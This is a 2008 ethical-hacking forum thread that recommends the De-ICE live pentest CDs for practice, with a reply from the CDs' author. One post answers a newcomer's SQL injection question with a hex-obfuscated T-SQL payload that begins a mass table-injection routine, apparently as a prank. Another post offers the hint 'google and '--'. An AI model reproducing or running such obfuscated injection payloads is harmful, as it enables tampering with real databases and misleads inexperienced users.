.

So you want to learn hacking?

<<

Kev

Sr. Member
Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Fri Aug 01, 2008 11:34 am

So you want to learn hacking?

I made a post earlier about my concerns about people assuming hacking is limited mostly to exploiting software.  The founder of the Metasploit project himself made it clear at the last Blackhat conference that “hacking is not about exploits. As many professional auditors know, only one or two real exploits may be used during a penetration test.”  He mentioned that most of the time you are cracking passwords, exploiting trust relationships, etc…

At that same conference, the opening speaker, Richard Clarke (former chief counter-terrorism adviser to the US National Security Council) seemed to think completely opposite of that perception. He seemed to feel if we could get coders to write more secure software all would be right in the world.

What concerns me is if someone new to security simply downloads a copy of Backtrack and runs autopwn on their network and doesn’t get a shell, now feels his network must be secure.  This couldn’t be further from the truth.

There is a site I have started to recommend to those new to security. Most of us know about it, but I am not sure how many have actually gone there and downloaded the live CDs and hacked them. I am referring to the DE-ICE.net live pentest cds.

This is such a great concept and I really support it for training those new to the field. Now I have only downloaded the first 2 and I will say any seasoned hacker can get through them quickly, but what I like is you can’t exploit them to get root with metasploit. You have to think like a hacker.

My understanding is the scenarios were created from “real life” pentests the author of these Cds Tom Wilhelm encountered in the field.  The entire concept of live pentest CDs has so much merit.  You can easily boot them up and hack away. If you screw things up, just reboot.  The very best thing about this project is there is a challenge involved. That has always been the weak part of a home lab. Now I am a big supporter of having a lab and have made a number of posts here about doing that. But the one weak aspect is you already know if it’s vulnerable or not when you set it up. Well, unless you are into exploit research, but most CEHs are not doing that and  are simply practicing with their tools.  Being great with tools is fine, but it doesn’t teach you how solve puzzles and that’s what hacking is all about. A live pentest CD on the other hand presents a puzzle for you try and figure out.  It teaches you how to “think” like a hacker and how to solve puzzles. This is in my opinion the most crucial quality to gain and I really don’t care how well you know all the switches of nmap or you know metasploit top to bottom, etc…

Yes, like anything there are some short coming and live cds are not perfect. They don’t give the feel of a networked environment. However you could rewrite them to be if you wished, but thats not really what they are all about any way.  There are not many available so far and of course they are all presented in linux so you wont be hacking server 2003, but once you have the concepts down you could easily apply the concepts to any OS. 

If you do decide to take a stab at the CDs , please resist the temptation to looks at the spoilers out there.  There are even full video spoilers available, but this would make as much sense as going to an answer page of a crossword puzzle before you even try and filling in all the blanks!   I doubt that will make you a better crossword player. Just to say again, the value is not that you are going to learn some new amazing hacking technique, but that you can learn to solve puzzles and think like a hacker. 

From what I gather, this is the same attribute that Muts is trying to instill in his course and if you are going after that certification, before you take the test it might benefit you to run through these Cds. I really can only say good things about the concept and I hope one day it will be expanded to include every level of challenge.

http://de-ice.net/index.php?name=News&f ... icle&sid=1
Last edited by Kev on Fri Aug 01, 2008 11:45 am, edited 1 time in total.
<<

oleDB

User avatar

Recruiters
Recruiters

Posts: 236

Joined: Thu Jul 20, 2006 8:58 am

Location: HOA

Post Fri Aug 01, 2008 1:59 pm

Re: So you want to learn hacking?

Great Post. Thats a cools site, thanks for the link.

I would have to describe the difference in philosophy of HD and the General as one who thinks about design security vs. implementation security. Its kind of a lame analogy, but follow me on this. HD or any other pen tester out there, is primarily involved down in the weeds doing actual red team work. They are the ones exposed to the actual implementation, and constantly see that its not some elite exploit that gets them in, but careless mistakes or just plain dumb implementations. Now consider the same instance from the General's view point. He is a high level guy. His guys tell him everything is patched, so the only way some is breaching his network is via an unknown exploit, as far as he is concerned. So you see the difference between the real world on the front lines, and the high level check-box mentality.
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Sat Aug 02, 2008 2:49 am

Re: So you want to learn hacking?

Kev,

great post, I've played with the De-ICE tools in the past have had some success and fun. From a learning perspective there are few things better than being thrown in at the deep-end to put the theory into practice.
<<

cleanwithit0607

Newbie
Newbie

Posts: 49

Joined: Thu Mar 27, 2008 5:17 am

Post Sun Aug 03, 2008 8:30 am

Re: So you want to learn hacking?

Dang, Kev. Thanks for making this post. I had never heard of De-Ice.net. This should help me alot before I take the OSCP. I trust anything you say Kev.  ;D
A+, Network +, Security +, Linux +,

MCP/MCTS: Vista Config.

Work in progress: CEH

Currently Reading: Hacking-The Art Of Exploitation.

Recommended book: Counter Hack Reloaded.
<<

dalepearson

Sr. Member
Sr. Member

Posts: 357

Joined: Thu Nov 09, 2006 10:03 am

Post Mon Aug 04, 2008 4:40 pm

Re: So you want to learn hacking?

Kev,

great post and I will have a look at this.
Are you aware of any other similar projects?

There used to be similar versions for forensic training, but due to the time required to build an image for testing forensic skills these have almost deminished, but anything like this for training purposes are excellent.
<<

RobMongoose

User avatar

Newbie
Newbie

Posts: 28

Joined: Sat May 31, 2008 1:52 pm

Location: Sunderland, UK

Post Mon Aug 04, 2008 7:55 pm

Re: So you want to learn hacking?

I'd not heard of this so thanks for posting. I'll have to give these a go.

Something to do with the time I have on my hands before I start back at uni anyway...  ;D
Mutterings of an evil genius in training -
http://robmongoose.blogspot.com/
<<

Kev

Sr. Member
Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Wed Aug 06, 2008 1:11 pm

Re: So you want to learn hacking?

Thanks for the comments everyone. I am hoping when I have a little extra time to create a few live CDs to help contribute to the concept. Certainly one of these should be for forensic analysis as well some others for several levels of  penetration difficulty. Hopefully others out there will  also be inspired to help this project.
Last edited by Kev on Wed Aug 06, 2008 1:12 pm, edited 1 time in total.
<<

bruha666v

Newbie
Newbie

Posts: 7

Joined: Thu Aug 07, 2008 12:32 am

Post Sun Aug 10, 2008 2:19 am

Re: So you want to learn hacking?

hey guys!

im Bruha666v from the philippines...I've recently learned about SQL injection.

Well, its really cool coz u get to inject some codes on vulnerable sites.Well, do u guys haev any suggestions on how to start with SQL injection???

Please help me out guys...


THanks


Bruha666c
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Sun Aug 10, 2008 3:09 am

Re: So you want to learn hacking?

bruha666v wrote:Well, its really cool coz u get to inject some codes on vulnerable sites.Well, do u guys haev any suggestions on how to start with SQL injection???


Bruha666v,

try google and '-- for starters.

I also saw a new web application testing book (can't remember the title) that contains example web pages that can be used as practice targets. Could be worth a look, it's on my reading list (as soon as I remember the name....)
<<

Grendel

User avatar

Full Member
Full Member

Posts: 246

Joined: Thu Aug 28, 2008 8:48 am

Location: Colorado Springs, CO

Post Thu Aug 28, 2008 10:01 am

Re: So you want to learn hacking?

Kev -

I'm the guy behind the de-ice.net pentest disks, and wanted to thank you for the well-written post and kudos.  It's good to see some people are starting to realize pentesting is so much more than simple vulnerability tests; but obviously there is a lot more work that needs to be done to educate the masses (especially those with a "C" in front of their title or a lot of metal on their shoulders).

I caught that you tried the first two disks, and will agree with you that they can be plowed through pretty quickly by any seasoned pro.  However, you should give the lvl 2 disk a shot - quite a bit more difficult.  ;)  We do have a lvl 3 disk in development, but again it will not include known exploits (serious emphasis on "known").  That should be out right around the holiday season (we all need a distraction around that time of year, especially when in-laws are in town, eh?).

Again, thanks for the kudos, and please don't hesitate to contact me with any suggestions / comments / war stories.

- Tom W.
- Thomas Wilhelm, MSCS MSM
ISSMP CISSP SCSECA SCNA IEM

Web Site:
  • http://HackingDojo.com
Author:
  • Professional Penetration Testing
  • Ninja Hacking
  • Penetration Tester's Open Source Toolkit
  • Metasploit Toolkit for Penetration Testing
  • Netcat Power Tools
<<

dean

Post Thu Aug 28, 2008 12:07 pm

Re: So you want to learn hacking?

bruha666v,

try this:

  Code:
;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434c415245204054207661726368617228323535 292c40432076617263686172283430303029204445434c41524520 5461626c655f437572736f7220435552534f5220464f522073656c 65637420612e6e616d652c622e6e616d652066726f6d207379736f 626a6563747320612c737973636f6c756d6e732062207768657265 20612e69643d622e696420616e6420612e78747970653d27752720 616e642028622e78747970653d3939206f7220622e78747970653d 333520AS CHAR(4000));EXEC(@S);


you might want to decode the hex before running it though.
<<

Kev

Sr. Member
Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Thu Aug 28, 2008 12:26 pm

Re: So you want to learn hacking?

Hey Grendel,
  Yes, as soon as I have a little extra time I will check out the next disks and report back.  I really support your efforts in this direction and thanks for finding your way to our forum. 
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Thu Aug 28, 2008 2:34 pm

Re: So you want to learn hacking?

Welcome Grendel,

Thanks for reaching out and giving Kev a pat on the back. He does good work and deserves recognition. Please let us know when the next one is ready, and we will be sure to plug it.

Looking forward to seeing more of you on EH-Net?  ;)

All the best,
Don
CISSP, MCSE, CSTA, Security+ SME
<<

Grendel

User avatar

Full Member
Full Member

Posts: 246

Joined: Thu Aug 28, 2008 8:48 am

Location: Colorado Springs, CO

Post Thu Aug 28, 2008 6:22 pm

Re: So you want to learn hacking?

don wrote:Welcome Grendel,

Thanks for reaching out and giving Kev a pat on the back. He does good work and deserves recognition. Please let us know when the next one is ready, and we will be sure to plug it.

Looking forward to seeing more of you on EH-Net?  ;)

All the best,
Don


Strange that I haven't bumped into this site before - Kev's post hit google, which is how I found it.  I'll definitely be around, and will certainly keep everyone up on the latest pentest livecd releases.

- Tom W.
- Thomas Wilhelm, MSCS MSM
ISSMP CISSP SCSECA SCNA IEM

Web Site:
  • http://HackingDojo.com
Author:
  • Professional Penetration Testing
  • Ninja Hacking
  • Penetration Tester's Open Source Toolkit
  • Metasploit Toolkit for Penetration Testing
  • Netcat Power Tools
<<

LSOChris

Post Thu Aug 28, 2008 10:26 pm

Re: So you want to learn hacking?

so really we just need to randomly but de-ice into threads and we'll get you to show up...

:D

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software